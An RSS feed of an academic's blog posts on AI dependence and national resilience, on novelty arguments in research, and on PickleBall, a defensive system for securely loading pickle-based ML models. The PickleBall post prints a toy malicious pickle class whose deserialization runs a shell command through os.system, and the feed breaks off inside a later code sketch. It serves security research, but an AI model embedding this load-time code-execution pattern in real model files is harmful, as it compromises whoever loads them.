<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:cc="http://cyber.law.harvard.edu/rss/creativeCommonsRssModule.html">
    <channel>
        <title><![CDATA[Stories by James Davis on Medium]]></title>
        <description><![CDATA[Stories by James Davis on Medium]]></description>
        <link>https://medium.com/@davisjam?source=rss-5917da729916------2</link>
        <image>
            <url>https://cdn-images-1.medium.com/fit/c/150/150/1*Y3LC5OdFEAmDRHCsu1iSlg.png</url>
            <title>Stories by James Davis on Medium</title>
            <link>https://medium.com/@davisjam?source=rss-5917da729916------2</link>
        </image>
        <generator>Medium</generator>
        <lastBuildDate>Fri, 24 Apr 2026 15:34:49 GMT</lastBuildDate>
        <atom:link href="https://medium.com/@davisjam/feed" rel="self" type="application/rss+xml"/>
        <webMaster><![CDATA[yourfriends@medium.com]]></webMaster>
        <atom:link href="http://medium.superfeedr.com" rel="hub"/>
        <item>
            <title><![CDATA[Don’t let Generative AI Create Just-In-Time Knowledge Work]]></title>
            <link>https://davisjam.medium.com/dont-let-generative-ai-create-just-in-time-knowledge-work-c9e59ddc2e74?source=rss-5917da729916------2</link>
            <guid isPermaLink="false">https://medium.com/p/c9e59ddc2e74</guid>
            <category><![CDATA[education]]></category>
            <category><![CDATA[policy]]></category>
            <category><![CDATA[national-security]]></category>
            <category><![CDATA[software-engineering]]></category>
            <dc:creator><![CDATA[James Davis]]></dc:creator>
            <pubDate>Thu, 02 Apr 2026 16:48:55 GMT</pubDate>
            <atom:updated>2026-04-02T20:19:34.067Z</atom:updated>
            <content:encoded><![CDATA[<h3><strong>AI Dependence: The Overlooked Tradeoff Between Economic Prosperity and National Security</strong></h3><p>America’s AI policy is increasingly organized around a simple idea: adopt AI broadly, build the infrastructure to support it, and train the workforce to use it. The <a href="https://www.whitehouse.gov/wp-content/uploads/2025/07/Americas-AI-Action-Plan.pdf">White House AI Action Plan</a> explicitly links national strength to rapid AI adoption, large-scale AI infrastructure, and an AI-ready workforce. The White House’s executive order on <a href="https://www.whitehouse.gov/presidential-actions/2025/04/advancing-artificial-intelligence-education-for-american-youth/">Advancing Artificial Intelligence Education for American Youth</a> pushes AI literacy deeper into American education. The Department of Energy’s <a href="https://www.energy.gov/articles/energy-department-announces-293-million-funding-support-genesis-mission-national-science">Genesis Mission</a> treats AI as core national infrastructure for science and innovation, backed in 2026 by a $293 million funding call. OpenAI’s <a href="https://openai.com/global-affairs/introducing-openai-for-government/">government announcement</a> describes a Defense Department contract with a ceiling of $200 million to prototype frontier-AI uses in administration and cyber defense. Every CEO in the country is emphasizing AI adoption as an existential mandate.</p><p>At one level, this is entirely rational. Generative AI is a real productivity technology. The <a href="https://www.oecd.org/content/dam/oecd/en/publications/reports/2025/06/the-effects-of-generative-ai-on-productivity-innovation-and-entrepreneurship_da1d085d/b21df222-en.pdf">OECD’s 2025 review</a> of experimental evidence finds measurable gains across tasks such as writing, coding, summarization, editing, and customer support, often in the 5% to 25% range depending on the task and setting. Generative AI is an amplifier: it lets capable people work faster and often at a higher level of abstraction.</p><p>But the most important question is not whether AI raises productivity. It does. The real question is what kind of national workforce and technical capacity we <strong><em>should</em></strong> build when productivity increasingly depends on AI-mediated abstraction. American policy is not merely encouraging people to use better tools. It is encouraging the country to reorganize more and more knowledge work around a service layer that sits above direct implementation.</p><p>We have seen versions of this dynamic before. STEM education has long traded low-level mechanism for leverage. In computing, for example, we stopped expecting most students to think in assembly; many programs moved to C, then Java, and now often Python or JavaScript in introductory courses. Across STEM more broadly, the center of gravity has shifted from direct implementation toward modeling, integration, and evaluation. Generative AI pushes that trend much further. It enables a more radical division of labor, in which technical workers increasingly specify, critique, validate, and assemble work produced by a model rather than producing it directly.</p><h3>Productivity-First AI Adoption Creates National Fragility</h3><p>This trend can be enormously valuable for economic prosperity. It also creates a national-security problem. 
If a country reorganizes STEM education and professional practice around the assumption that the generator is always available, it will produce a workforce that is more productive in normal times but less resilient in crisis. Uncritical AI adoption will move human expertise upward, away from implementation and toward supervision. Yet the underlying AI layer is becoming an increasingly centralized, and therefore targetable, dependency.</p><p>That assumption is much more dangerous for generative AI than it was for older abstraction shifts.</p><ul><li>If a nation loses domestic chip fabrication capacity, that is severe, but it is in some sense a manufacturing problem. Existing devices, existing software, and existing human skills do not instantly disappear.</li><li>By contrast, if a nation loses access to the serving infrastructure for generative AI, the capability itself degrades immediately. The model is not a book on a shelf. It is a live service. It depends on data centers, electrical power, network backbones, cooling systems, and continuous operations at extraordinary scale.</li></ul><p>That makes generative AI a new and distinctive foundation for national productivity. It is not just sophisticated software. It is software whose usefulness depends on uninterrupted access to fragile, high-value physical infrastructure. Yes, other infrastructures matter too. But most of them fail locally. A power outage in New York does not stop work in Los Angeles. A failure at a dominant AI provider can break workflows across the entire country at once. That is a different kind of dependency: not merely critical, but centralized enough to create nationwide common-mode failure.</p><h4>What’s the worst that could happen?</h4><p>The vulnerability becomes clearer when we imagine a few serious disruptions. One possibility is physical loss of service. A severe space-weather event, a successful cyber-physical attack on data centers or transmission infrastructure, or a strike on major network chokepoints could make it impossible to serve large models at scale across industry, research, and government. In that world, AI dependence looks like a straightforward infrastructure problem: the layer on which productivity relied is simply gone.</p><p>But a more dangerous case may be partial failure rather than complete failure. Suppose the systems still run, but the models have been poisoned, degraded, or otherwise made subtly unreliable. They may become slightly more error-prone, biased in ways that are hard to notice, or systematically weak on exactly the classes of tasks that matter most. A degraded but still plausible system is harder to detect and therefore more dangerous. It can quietly contaminate work at scale, especially if the surrounding workforce has lost too much of the underlying expertise needed to identify and correct the errors.</p><h4>The models are gone and no one remembers what to do</h4><p>What happens then? If generative AI has become the substrate for engineering work, then disabling or degrading the GenAI serving layer does not merely make us less efficient. It exposes a deeper national vulnerability: a generation of highly productive professionals who were trained to operate one or two abstraction layers higher, but who no longer know how to drop down when the abstraction disappears.</p><p>Economic logic says to let people work at the highest-leverage layer available. Of course it does. 
If AI lets one engineer do the work of several, or lets a scientist move faster from question to prototype, then broad adoption should raise output. The White House and DOE are not irrational for wanting that. They are responding to a genuine competitive opportunity.</p><p>But security logic asserts that a nation must be able to function when its highest-leverage layer fails. A country can rationally decide that many workers need not understand transistor physics, compiler internals, or even much programming-language syntax for day-to-day prosperity. But it cannot rationally allow all implementation competence to atrophy while simultaneously moving essential work onto infrastructure that is centralized, power-hungry, network-dependent, and physically targetable.</p><p>How do we balance these aims? AI adoption must be paired with the deliberate preservation of fallback competence. In STEM education, we should be very careful before treating implementation knowledge as obsolete. Generative AI invites us to move one layer higher: away from directly carrying out technical work and toward specifying, critiquing, and validating it. But our students must still understand the mechanisms, constraints, and failure modes beneath the AI layer, all the way down the engineering stack. When the models are available, abstraction is a source of leverage. When the models fail, abstraction becomes a trap. <strong>A prosperous nation may choose to educate many STEM workers at a higher level of abstraction. A secure nation must also ensure that enough of them can still work without it.</strong></p><p>COVID-19 already gave us a clear example of what happens when we forget to consider resilience. Between 1990 and 2020, humans built a highly optimized global supply chain: lean inventories, just-in-time delivery, tight coupling across continents, and very little slack. In normal times, that system delivered prosperity through efficiency. In crisis, it delivered shortages, delays, and strategic vulnerability. Generative AI offers the same kind of bargain for knowledge work. It makes professionals dramatically more productive under normal conditions. But if we build our national productivity model around the assumption of always-available AI service, then we are doing for cognitive labor what just-in-time logistics did for physical goods: removing slack, redundancy, and fallback capacity in the name of efficiency. That is not resilient prosperity. It is just-in-time knowledge work.</p><h3>What then shall we do?</h3><p>This is a complex problem, and I don’t know the solution. I do have some ideas, though.</p><ol><li>First, <strong>industry and government must recognize and reward deep expertise</strong>. They currently reward productivity, and productivity has, until now, been a reasonable proxy for expertise. Generative AI (at least when it’s working!) has decoupled them. A worker can now produce impressive output by leaning on a system whose underlying mechanisms they do not understand. That is economically useful, but it is not the same thing as mastery. Certifications, hiring standards, promotion criteria, and compensation structures should be careful not to collapse the distinction. <strong>A society that stops rewarding people who can still operate below the GenAI abstraction layer will eventually discover that it has too few of them.</strong></li><li>Second, <strong>university engineering education may need a third track</strong>. 
At the moment, in the United States, we largely have two broad models: associate’s degrees, which often emphasize practical workforce preparation, and bachelor’s degrees, which typically aim for a deeper and broader professional formation. Generative AI may force a sharper distinction within technical education itself. One track might optimize for high-leverage AI use in ordinary practice: specifying, orchestrating, validating, and integrating. Another must deliberately preserve deeper implementation capability: the ability to work close to the mechanism, reason from first principles, and reconstruct capability when the higher layer fails. Perhaps that means more five-year degree programs, or new kinds of majors, concentrations, and professional credentials. I do not know the right institutional form. But preserving this deeper layer of technical competence should become a national priority. We should also say so plainly to students: overreliance on generative AI can make you more productive while also making you less capable. Formalizing that distinction through degree structures may help communicate the point. Right now, all most faculty can do is ask students not to become dependent on a system the country is simultaneously telling them to depend on. <strong>That is a contradiction, not a strategy.</strong></li><li>Third, <strong>AI Dependence should be regulated the way other systemic dependencies are regulated</strong>. Companies optimize for good times. Regulators mandate enough inefficiency to survive bad times. We do not let banks maximize short-term return by lending without limit. We require capital reserves and stress tests because a bank optimized only for good times becomes dangerous in bad times. The same logic applies here: an organization that shifts too much of its operational competence onto generative AI becomes highly efficient under normal conditions, but fragile under disruption. A national regulatory framework could therefore require some organizations — critical firms, national labs, the Department of Defense, and similar actors — to demonstrate a <strong>sub-GenAI competency reserve</strong>: a real, exercised ability to continue essential operations when AI service is degraded, unavailable, or untrustworthy. These organizations should also be stress tested under simulated model outages or severe service degradation to verify that they can still perform critical functions in degraded mode. <strong>The goal is not to make the USA AI-independent, but to prevent critical organizations from becoming AI-insolvent.</strong></li></ol><h3>Conclusion</h3><p>I am not arguing against the adoption of generative AI. The productivity gains are real, and it would be foolish for firms, universities, and governments to ignore them. A country that refused to use a technology with clear leverage effects on writing, coding, design, analysis, and scientific work would be choosing self-imposed decline. That is why the present national push toward AI adoption is so easy to understand. It promises more output, faster iteration, and a higher level of abstraction for an enormous share of knowledge work. But productivity is not the only national objective! Resilience matters too. A system that is optimized only for performance in normal conditions becomes brittle under disruption. If generative AI becomes the default substrate for technical and professional work, then the United States may gain economic speed while also increasing strategic fragility. 
Our national capability may come to depend on a centralized service layer that many institutions no longer know how to do without.</p><p>That is what I mean by <strong><em>AI Dependence</em></strong>. It overlaps with other forms of dependence, but it is not reducible to any one of them. It is not just dependence on the Internet, though internet failure is one way the risk may manifest. It is not just dependence on cloud providers, though provider concentration is part of the problem. It is not just worker overreliance on convenience tools, though that matters as well. It is a broader sociotechnical condition in which productivity, expertise, and institutional practice are reorganized around the assumption that a small number of AI systems will remain continuously available, trustworthy, and effective.</p><p>I like the productivity. I do not like the risk. A serious national AI strategy should admit that these two facts come together. If we want the prosperity that generative AI may help create, then we should also invest deliberately in the human competence, institutional slack, and fallback capacity needed to survive the day that the AI layer fails.</p><h4>Postscript</h4><p>One objection to this argument is that it merely redescribes a strike on key internet nodes, data centers, or power infrastructure. That objection is partly right, but not right enough. AI Dependence certainly includes those scenarios, because generative AI is delivered through physical infrastructure and networked service. If major internet chokepoints or cloud regions fail, AI-dependent work will fail with them.</p><p>But the construct of AI Dependence is broader than that. The same strategic vulnerability can arise even when the internet remains up. A dominant model provider may suffer a serious outage. A model may be quietly poisoned, degraded, or made unreliable in ways that are difficult to detect. Access policies may change. Costs may spike. A workforce may become so accustomed to operating at the AI layer that it can no longer recover lower-level capability quickly, even when the underlying hardware and networks are intact. In other words, a strike on key infrastructure is one possible mechanism of failure. It is not the whole phenomenon.</p><p>That is why I think AI Dependence is worth naming as its own construct. It captures not merely the physical vulnerability of AI systems, but also the institutional and educational vulnerability created when a society reorganizes expertise around them. We should want the economic upside of generative AI. But we should be honest that this upside may come with a new national exposure: not just the loss of a tool, but the loss of a layer on which too much work has come to depend.</p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=c9e59ddc2e74" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Different Contributions Require Different Novelty Arguments]]></title>
            <link>https://davisjam.medium.com/different-contributions-require-different-novelty-arguments-42b2dac0eade?source=rss-5917da729916------2</link>
            <guid isPermaLink="false">https://medium.com/p/42b2dac0eade</guid>
            <category><![CDATA[research]]></category>
            <category><![CDATA[software-engineering]]></category>
            <category><![CDATA[design]]></category>
            <category><![CDATA[science]]></category>
            <category><![CDATA[epistemology]]></category>
            <dc:creator><![CDATA[James Davis]]></dc:creator>
            <pubDate>Fri, 27 Mar 2026 18:20:40 GMT</pubDate>
            <atom:updated>2026-03-27T18:20:40.322Z</atom:updated>
<content:encoded><![CDATA[<p>This is another post in my series capturing conversations I&#39;ve had with graduate students that contain some kernel of insight I thought might be useful to share with the rest of the world.</p><h3>The just-so story of research novelty</h3><p>We often teach novice researchers a simple story about novelty: survey the literature, find a gap, fill it, and you have a paper. This is a “<a href="https://en.wikipedia.org/wiki/Just-so_story">just-so story</a>” that works well to introduce the research process. This paradigm is presented in books like “The Craft of Research” and in myriad seminars for undergraduates and first-year graduate students. But it is a simplification of research reality.</p><p>Different kinds of contributions require different novelty arguments, and the “gap in the literature” argument fits some of them better than others.</p><h3>Three kinds of contributions and their novelty arguments</h3><p>Here is a rough taxonomy. The gap-in-the-literature paradigm applies to the first two, but not the third.</p><ul><li><strong>Type One: Explanatory Contributions. </strong>In software engineering, an explanatory contribution seeks to account for patterns in practice by identifying the factors and relationships that help explain them. These contributions do not merely report observations; they synthesize evidence into an account of why some engineering behavior occurs, what shapes it, and under what conditions it changes. For example, in our lab’s work on software signing, our <a href="https://davisjam.medium.com/signing-in-four-public-software-package-registries-quantity-quality-and-influencing-factors-7af4b416b6db">S&amp;P’24 measurement study</a> provided evidence (a Type Two contribution) that signing adoption and signature quality vary substantially across software package registries, and that factors such as registry policy and tooling appear to matter more than public security events alone. Building on that evidence, our later interview and usability studies moved toward explanation: in a <a href="https://davisjam.medium.com/an-industry-interview-study-of-software-signing-for-supply-chain-security-8666d27539f8">2025 USENIX Security paper</a>, we develop a refined model of software-signing practice and identify technical, organizational, and human challenges affecting adoption and use in industry; our follow-up <a href="https://arxiv.org/pdf/2503.00271">USENIX Security’26 paper</a> explains how usability factors, organizational context, and deployment setting shape the adoption of next-generation signing tools such as Sigstore. Explanatory contributions in software engineering often emerge by interpreting prior empirical results and turning them into a more general account of the forces that govern engineering practice.</li><li><strong>Type Two: Evidence-Building Contributions. </strong>In software engineering, an evidence-building contribution tests claims about software practices, tools, or techniques by collecting and analyzing data. Sometimes the goal is to evaluate predictions suggested by prior ideas; other times the goal is to produce the first rigorous evidence about an understudied practice. For example, in our <a href="https://arxiv.org/pdf/2503.13762">ICSE 2026 paper on unit proofing for memory safety verification</a>, the contribution is not a new verification theory, but empirical evidence about the effectiveness, cost, and characteristics of a verification practice that had previously lacked systematic evaluation. 
The paper presents the first empirical study of unit proofing for memory safety verification, reporting defect-detection rates, development costs, execution times, and other practical findings that can inform both engineering adoption and future research. If the literature does not yet contain the necessary evidence to evaluate a practice or claim, then that missing evidence is a legitimate gap that an empirical software engineering paper can fill.</li><li><strong>Type Three: Capability Development</strong>. In software engineering, a capability-building contribution gives practitioners or researchers a way to do something they could not previously do except through expensive, manual, or poorly scalable effort. The novelty argument is therefore not simply “no one has published this before,” but rather “this task was not previously achievable in a practical way using routine means.” Our <a href="https://davisjam.medium.com/fail-analyzing-software-failures-from-the-news-using-llms-630b7905f07e">ASE 2024 paper</a>, FAIL, is an example. Prior work had shown that software failures reported in the news can be valuable for engineering analysis, but existing approaches relied largely on manual study. FAIL contributes a new capability: an automated pipeline that searches, filters, merges, and analyzes failure reports from the news, enabling large-scale analysis of thousands of incidents at modest cost. During the rebuttal process, we sharpened this point: the contribution was a systems design and implementation that automated a previously manual activity and made ongoing large-scale failure analysis feasible. The central question of the paper was not whether LLMs are themselves new, but whether combining them into this pipeline yielded a nontrivial and useful new capability for software engineering.</li></ul><p>I think Types One and Two are relatively straightforward to understand, so I won’t discuss them further. I do not mean that they are simple, but rather that their criteria are understandable. Let’s talk more about Type Three.</p><p>I once heard a representative from the US Defense Advanced Research Projects Agency (DARPA) describe Type Three contributions like this: &quot;<em>Can we solve this with five guys, one year, and elbow grease?</em>&quot; If a problem can be solved by five guys combining existing techniques and some elbow grease, then it probably does not justify a research paper. This is true <strong>whether or not there is a paper in the scholarly literature describing the solution</strong>. And here is the key difference from the earlier types that I described. For engineering research, the bar is not &quot;<em>Is it in the literature?</em>&quot;, but rather “<em>Is it possible through a straightforward application of the state-of-the-art methods?</em>”</p><h3>Guidance for Conducting Type Three, Capability-Developing Research</h3><p>If you are proposing to develop a new capability, then a Type Three contribution places quite a high burden on you. The novelty claim cannot rest solely on being the first to build a capability. You must also show that it was not previously achievable through routine means.</p><p>You must therefore construct, to the best of your ability as a practitioner of the art, the best solution(s) to the problem that use current knowledge. 
You must master not only the research literature from your own field, but also the literature from adjacent fields, as well as techniques in the patent literature, commercial products, and artifacts from &quot;the Internet&quot; (open-source software, blog posts, and so on). If you can construct such a solution without inventing anything new, then you have a pickle — you have built a new thing that did not previously exist, but its novelty is in the composition of existing techniques rather than in the development of a new technique.</p><p>Here is another way to think about it. If you want to claim a new capability, you must construe the idea of “prior art” broadly, because your competitors are not only the researchers who happen to have worked on this problem before, <em>but also any well-informed engineer with a can-do attitude</em>. That is why novelty arguments for capability-building work are often broader and more demanding than novelty arguments for Type One (explanatory) or Type Two (evidence-building) work.</p><p>If you are planning Type Three research, here are some questions you can ask yourself to structure your effort and articulate your results:</p><ol><li><strong>Why is this hard?</strong> Is the capability already achievable in practice with known methods? If not, what specific obstacle blocks routine composition?</li><li><strong>What is your “secret sauce”? </strong>What is the nature of the insight needed to obtain the new capability? Does this work introduce a new method, a non-obvious integration principle, or strong evidence that changes what practitioners can reliably do?</li><li><strong>What are the limits of your approach? </strong>How general is the insight? What are the related problems to which it is applicable, and what are the <a href="https://medium.com/@davisjam/essential-vs-accidental-arguments-in-novelty-claims-for-system-design-cfcf37b46cdc">essential limits</a> of the technique?</li></ol><h3>Closing remarks</h3><p>A useful analogy comes from patent law, which asks whether an invention is useful, novel, <strong><em>and non-obvious</em></strong>. Capability-building papers face a similar challenge. Reviewers will rarely dispute utility if the system works, and they may grant that you are first to solve the problem. The harder question is whether the solution required genuine insight, rather than the routine composition of known techniques.</p><p>I think capability-building research is exciting. You show people how to solve a real problem, or how to complete their tasks much more quickly, with less memory, more securely, in a more energy-efficient way, etc. It’s amazing to help make the world a better place. But it’s hard to publish it if the novelty argument is vague. So here is the rule: <strong>to publish capability-building research, you must show that the capability was not previously achievable through routine means, and clarify the insight that made it possible.</strong></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=42b2dac0eade" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[PickleBall: Secure Deserialization of Pickle-based Machine Learning Models]]></title>
            <link>https://davisjam.medium.com/pickleball-secure-deserialization-of-pickle-based-machine-learning-models-a089113e6b0f?source=rss-5917da729916------2</link>
            <guid isPermaLink="false">https://medium.com/p/a089113e6b0f</guid>
            <category><![CDATA[software-engineering]]></category>
            <category><![CDATA[cybersecurity]]></category>
            <category><![CDATA[machine-learning]]></category>
            <category><![CDATA[software-development]]></category>
            <category><![CDATA[artificial-intelligence]]></category>
            <dc:creator><![CDATA[James Davis]]></dc:creator>
            <pubDate>Mon, 24 Nov 2025 22:25:18 GMT</pubDate>
            <atom:updated>2025-11-24T22:35:42.403Z</atom:updated>
<content:encoded><![CDATA[<p>This blog post summarizes our work “<em>PickleBall: Secure Deserialization of Pickle-based Machine Learning Models</em>”, which appeared at the 2025 ACM Conference on Computer and Communications Security (<a href="https://www.sigsac.org/ccs/CCS2025/accepted-papers/">CCS’25</a>). The work was the result of collaboration between groups at Columbia, Brown, Purdue, Google, and Technion. The published paper is <a href="https://dl.acm.org/doi/10.1145/3719027.3765037">here</a> and is open-access (no paywall). An extended version is available on arXiv, <a href="https://arxiv.org/pdf/2508.15987">here</a>.</p><p>This post was written by the lead author, Andreas Kellas, with light editing from me.</p><h3>Summary</h3><p>Machine learning models are shared and reused in the open model ecosystem. Just like in conventional software (“<a href="https://medium.com/stackademic/sok-analysis-of-software-supply-chain-security-by-establishing-secure-design-properties-6a0c897d5777">software supply chain attacks</a>”), attackers want to gain unauthorized access to computing systems by sharing compromised models. So far, attackers have targeted the serialization format that encodes the models, injecting executable code that is triggered during the model loading process (deserialization).</p><p>In this work, we study the Hugging Face open model ecosystem and specifically focus on the pickle model format. We design and implement <strong>PickleBall</strong>, a system for securely loading pickle-based models. Our evaluation shows that PickleBall prevents all known malicious models from loading, while loading more benign models than other secure solutions.</p><p>Our contributions are:</p><ol><li>A study of the model serialization formats in the Hugging Face ecosystem and of the prevalence of pickle;</li><li>The <strong>PickleBall</strong> system for securely loading pickle models with library-specific loading policies; and</li><li>A <strong>dataset</strong> of over 300 benign and malicious pickle models and programs for evaluating pickle-security solutions.</li></ol><h3>Background: Insecure Pickle Model Loading</h3><p>The growing ecosystem of pre-trained ML models enables machine-learning engineers to routinely download and load models from public hubs like the Hugging Face Model Hub. The model supply chain has similar risks to the traditional software supply chain. Malicious actors can abuse this by uploading backdoored models.</p><p>Backdoored models can appear in two forms:</p><ol><li>Weights-based backdoors, where the malicious actor intends to compromise the inference result of a model; and</li><li>Code-execution backdoors, where the malicious actor intends to compromise the system that loads and uses the model.</li></ol><p>This work focuses on preventing the second class: <strong>code-execution backdoors</strong>.</p><p>Code-execution backdoors abuse the model saving and loading process, which differs based on the selected model serialization format. Models are saved using one of many serialization formats, each with its own advantages and disadvantages. Almost all malicious models discovered to date on Hugging Face use the pickle format, which is Python’s native serialization format and stands out for being extremely expressive. Attackers abuse this expressivity to create backdoored models that execute malicious code when the model is loaded.</p><p>The expressivity, and the risk, of the pickle format comes from its intertwining of code and data.</p>
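<p>To see how little an attacker needs, here is a minimal, illustrative sketch of the classic payload pattern (our own toy example, not one of the malicious models from our dataset): a Python object whose deserialization runs a shell command.</p><pre>import os
import pickle

class Malicious:
    # __reduce__ tells pickle how to rebuild this object:
    # "call os.system with this argument." The call happens at load time.
    def __reduce__(self):
        return (os.system, ("echo pwned",))

payload = pickle.dumps(Malicious())
pickle.loads(payload)  # prints "pwned": attacker code ran during deserialization</pre>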
<p>When the pickle module serializes a Python object, it encodes the object as a sequence of opcode instructions. During deserialization, these instructions are executed by a virtual machine (the “Pickle Machine”) to reinstantiate the object. In order to instantiate complex Python objects, like models, the Pickle Machine permits some opcodes to <strong>import</strong> arbitrary Python callables (functions or classes), and to <strong>invoke</strong> Python callables. This intertwining gives attackers a very straightforward primitive to execute code when the pickle program executes (<em>i.e.</em>, is deserialized): for example, by creating a pickle program that imports and invokes `os.system` with attacker-controlled arguments, as in the sketch above.</p><p>The insecurity of pickle loading is a well-known problem, and the ML engineering community has come up with a few different security approaches:</p><ol><li><strong>Less expressive model formats</strong> are recommended instead of the pickle format. The SafeTensors format is one secure alternative to pickle. Rather than permitting code in the serialized representation, it only encodes the data that represents the model weights and parameters.</li><li><strong>Model scanners </strong>analyze the model to detect if the model is malicious, usually by applying a denylist of suspected malicious callables. Platforms like Hugging Face integrate model scanners so that anytime a model is uploaded, it is scanned for malware. In practice, these denylists are necessarily incomplete and can be bypassed.</li><li><strong>Restricted loaders</strong> are custom implementations of the Pickle Machine that prevent it from accessing any callables outside of limited allowlists. The prime example is the PyTorch <em>Weights-Only Unpickler</em>, which is enabled by default in PyTorch v2.6 and later. The Weights-Only Unpickler uses a default allowlist that permits only a few callables that are safe, primarily from the PyTorch library. Models that use other callables cannot be loaded with this policy.</li></ol><h3>Is Pickle Serialization (still) a Problem in 2025? Some Measurements</h3><p>Given the state of pickle model security, we began with two questions:</p><ol><li>With alternate model formats available, is the risky pickle format still widely used in the model ecosystem?</li><li>Are the existing security solutions sufficient to protect pickle model loading?</li></ol><p>To answer these questions, we conducted a longitudinal study of the Hugging Face Model Hub over a period of ~2 years (January 2023 – March 2025). We measured the download rates and model formats of all repositories with more than 1,000 monthly downloads.</p><p>The next figure shows the results, which we describe below.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*-OSOk4_rsNhEtt7R4pX_3A.png" /><figcaption>A longitudinal analysis of Hugging Face model formats for repositories with at least 1000 monthly downloads. Repositories can contain multiple models, each in different formats. Each color groups repositories by the model formats they contain: at least one pickle model (green), exclusively pickle (red), and exclusively SafeTensors (blue). Solid lines refer to the number of repositories (left y-axis) and dashed lines track downloads (right y-axis).</figcaption></figure><p>The red lines show that many important models continue to use only the pickle format, and these pickle-only models are downloaded 400M+ times per month. 
The green lines show that repositories containing both pickle and SafeTensors versions of models are also increasingly downloaded, with 1.70 billion monthly downloads. When models are converted to the SafeTensors format, the associated pickle model is often kept for legacy purposes and can still present security risks.</p><p>We found that <em>pickle model downloads are increasing</em> despite the availability of other model formats. In the final month of our study, repositories with pickle models were downloaded 2.1 billion times, up from 500 million in the first month of the study.</p><p>After this measurement, we then sampled models from the study to determine whether they could be loaded by the PyTorch Weights-Only Unpickler. We found that among the ~1,500 most downloaded repositories, <em>15% contained pickle models that could not be loaded by the Weights-Only Unpickler</em> because they used disallowed callables.</p><p>To sum up: pickle models are still very prevalent in the Hugging Face ecosystem, and the existing Weights-Only Unpickler solution is not always usable. Model users are at risk and lack a security solution for their needs.</p><h3>PickleBall Design and Implementation</h3><h4>Goals</h4><p>To address the pickle model security gap, we set out to create a system for safe pickle model loading. We specifically target the adversary who creates malicious pickle-based models that import and invoke callables.</p><p>The system is <em>required</em> to prevent malicious models from executing unneeded callables, while permitting benign models to use the callables they need in order to load. The system should prioritize security: it should block all malicious models, while improving usability by loading more benign models without any user intervention than the existing approaches do.</p><p>We decided to achieve security and usability with <strong>context-specific loading policies</strong>, rather than applying one-size-fits-all allow- and deny-lists as previous solutions do.</p><h4>Intuition</h4><p>A security-conscious model user might ask: “<em>Are the callables used by this model </em><strong><em>necessary</em></strong><em> to load the model?</em>” If they are not, the user should not want the callables to be accessible during loading, lest they be used maliciously. We need a way to determine which callables are “necessary”.</p><p>To help make that determination, we observe that <strong>machine learning libraries are the interface between model saving and model loading programs</strong>, which gives us an opportunity to infer a model’s expected behaviors. When a user wants to use a model, they need to select an appropriate library API to load the model. The libraries provide APIs for loading and saving the model, as well as the class definition of the model type, which includes methods for tasks like inference.</p><p>For example, if the user believes a model is a flair model, they need to use the flair library to load the model and interact with it. The serialized model should encode an instance of the flair model class. A backdoored model might appear to be a flair model, but also include additional malicious callables.</p>
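<p>To make this concrete, a policy for a flair-like library might look like the following sketch. The names here are illustrative only; PickleBall derives the real lists automatically, and separates what may be imported from what may be invoked, as described below.</p><pre># Hypothetical policy for a flair-like library (illustrative names, not PickleBall output).
FLAIR_POLICY = {
    # Callables the pickle program may import (e.g., the model class itself).
    "allowed_imports": {
        ("flair.models", "SequenceTagger"),
        ("torch._utils", "_rebuild_tensor_v2"),
        ("collections", "OrderedDict"),
    },
    # The subset that may also be invoked while the model is being loaded.
    "allowed_invocations": {
        ("torch._utils", "_rebuild_tensor_v2"),
        ("collections", "OrderedDict"),
    },
}</pre>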
<p>However, if we know the callables needed to load any valid flair model, we can prevent any other callables from being accessible during loading.</p><p>This concept does not preclude malware — if an attacker can cook up an exploit that leverages only the callables of flair models (<em>e.g.,</em> through the combination of these interpreted as gadgets), then they can still exploit the system.</p><h4>Approach</h4><p>We applied this intuition to realize our PickleBall system. PickleBall applies a common security analysis pattern: it uses static analysis to generate a security policy, and enforces the policy at runtime. PickleBall specializes this pattern to the machine learning setting for loading pickle models, and its implementation must overcome key challenges, including the difficulty of statically analyzing dynamic Python code.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ytKO5fcH3p_TUQadlmoCfQ.png" /><figcaption>PickleBall works in two phases: (1) policy generation, and (2) policy enforcement to enable secure model loading. During policy generation, PickleBall takes as input the source code of an ML library and a class definition to analyze, and outputs a policy of allowed imports and invocations. During safe model loading, PickleBall enforces the extracted policy to protect the loading process. The loading application specifies the policy to enforce, based on the expected class of the model, and begins loading the model with the library API. The loading application can trust that any invocations of the Pickle Machine will be restricted to the configured policy.</figcaption></figure><p>PickleBall generates library-specific security policies. It first analyzes the (Python) library code to generate a policy for loading models with that library. When a user loads a model with the library API, PickleBall enforces the policy and either returns the deserialized model object, or else raises a security exception.</p><p><strong>Policy Generation: </strong>PickleBall’s policy for a given library is meant to contain all of the callables needed to load a valid model produced by the library. PickleBall creates the policy by statically analyzing the Python class definition of the model type in the library, and by identifying all callables needed to instantiate an object of that type in a pickle program.</p><p>Because of the difficulty of statically analyzing dynamic Python code, PickleBall’s policies can include more callables than needed, and might also exclude some callables needed by valid models:</p><ul><li>To mitigate the security impact of allowing more callables than necessary, PickleBall separates policies into <em>allowed imports</em> and <em>allowed invocations</em>. A callable on the allowed imports list is permitted in opcodes that import callables, and can then be used as a constructor. A callable can be invoked only when it is also on the allowed invocations list.</li><li>To mitigate the usability impact of excluding callables, PickleBall’s enforcement module applies <em>lazy enforcement</em>, described next.</li></ul><p><strong>Policy enforcement: </strong>PickleBall enforces a library’s policy at model-load time. PickleBall’s enforcement module is a modified version of the Python pickle module. We modified the opcodes that import and invoke callables to check the policy, and to raise security exceptions.</p>
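<p>The general enforcement pattern can be sketched with the standard library’s documented `pickle.Unpickler.find_class` hook. The sketch below is ours, not PickleBall’s implementation (PickleBall modifies the pickle module itself and enforces imports and invocations separately), and it folds in a simplified version of the lazy-enforcement idea described below:</p><pre>import io
import pickle

# Toy allowlist; PickleBall generates per-library policies by static analysis.
ALLOWED_IMPORTS = {
    ("collections", "OrderedDict"),
    ("torch._utils", "_rebuild_tensor_v2"),
}

class LazyStub:
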